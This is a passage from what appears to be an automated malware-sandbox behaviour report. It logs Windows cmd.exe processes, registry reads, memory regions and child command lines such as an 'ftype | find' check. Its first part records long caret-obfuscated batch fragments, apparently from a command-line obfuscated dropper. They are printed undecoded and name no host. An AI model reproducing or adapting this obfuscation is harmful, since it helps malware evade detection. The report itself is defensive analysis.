Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CMD.Exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
Environment	Get Environment String	name = ^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^\|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,	1	Fn
Environment	Get Environment String	name = ^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^	1	Fn
Environment	Get Environment String	name = ^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^	1	Fn
Environment	Get Environment String	name = ^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^	1	Fn
Environment	Get Environment String	name = ^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^	1	Fn
Environment	Get Environment String	name = ^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^	1	Fn
Environment	Get Environment String	name = ^R^en^6^w^L^P^jy^{^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^	1	Fn
Environment	Get Environment String	name = R^en6w^L^P^j^y^{^7^y^jU^6^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^	1	Fn
Environment	Get Environment String	name = ^R^en^6^w^L^P^j^y^{^7^y^j^U6^	1	Fn
Environment	Get Environment String	name = ^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^	1	Fn
Environment	Get Environment String	name = .^Y^.^Y^6^j^U^e/`^6^K^w^L^,^	1	Fn
Environment	Get Environment String	name = ^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^	1	Fn
Environment	Get Environment String	name = ^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^\|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^	1	Fn
Environment	Get Environment String	name = ^w^L^]^6^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^	1	Fn
Environment	Get Environment String	name = ^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^	1	Fn
Environment	Get Environment String	name = e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^	1	Fn
Environment	Get Environment String	name = ^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^	1	Fn
Environment	Get Environment String	name = ^=^T!)&& (, ; , ;, ( , ; , (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^	1	Fn
Environment	Get Environment String	name = ^!) , )&& ( , (^S^e^t ^ ^ ^^}=^!^^.^@^	1	Fn
Environment	Get Environment String	name = ^g; ; , ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; , ^\|, , ^^f^^iN^^d^^S^^t^^r ;^^c^^m '; ,) , ; ^d^o, , ;; ; (^e^c^h^O ,	1	Fn
Environment	Get Environment String	name = ^*^[^-^,	1	Fn
Environment	Get Environment String	name = \|	1	Fn
Process	Create	process_name = cmd.exe	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 26	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 3	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 7988	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 2	1	Fn Data
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xb04, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #4: cmd.exe

60

0

»

Information	Value
ID	#4
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /c ^f^t^Yp^e \| ^f^IN^d "SHCm"
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:39, Reason: Child Process
Unmonitor	End Time: 00:01:42, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xae0
Parent PID	0xac0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AE4

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
private_0x00000000000d0000	0x000d0000	0x001cffff	Private Memory	rw	-
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x001e0fff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	rw	-
private_0x00000000002b0000	0x002b0000	0x002bffff	Private Memory	rw	-
private_0x0000000000370000	0x00370000	0x0046ffff	Private Memory	rw	-
private_0x0000000000470000	0x00470000	0x0056ffff	Private Memory	rw	-
pagefile_0x0000000000570000	0x00570000	0x006f7fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000700000	0x00700000	0x00880fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000890000	0x00890000	0x01c8ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001c90000	0x01c90000	0x01fd2fff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01fe0000	0x022aefff	Memory Mapped File	r	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xae4

60

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:12 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 137296	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xae8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\find.exe, os_pid = 0xaf0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #5: cmd.exe

5828

0

»

Information	Value
ID	#5
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /S /D /c" ftYpe "
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:39, Reason: Child Process
Unmonitor	End Time: 00:01:43, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xae8
Parent PID	0xae0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x AEC

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x001bffff	Private Memory	rw	-
pagefile_0x00000000001c0000	0x001c0000	0x001c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x001e0fff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x002effff	Private Memory	rw	-
private_0x00000000002f0000	0x002f0000	0x002f0fff	Private Memory	rw	-
private_0x00000000003b0000	0x003b0000	0x004affff	Private Memory	rw	-
private_0x0000000000600000	0x00600000	0x0060ffff	Private Memory	rw	-
pagefile_0x0000000000610000	0x00610000	0x00797fff	Pagefile Backed Memory	r	-
pagefile_0x00000000007a0000	0x007a0000	0x00920fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000930000	0x00930000	0x01d2ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001d30000	0x01d30000	0x02072fff	Pagefile Backed Memory	r	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
advapi32.dll	0x7feff0e0000	0x7feff1bafff	Memory Mapped File	rwx	-
sechost.dll	0x7feff1c0000	0x7feff1defff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x7feffc50000	0x7feffd7cfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xaec

5828

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:12 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 137561	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
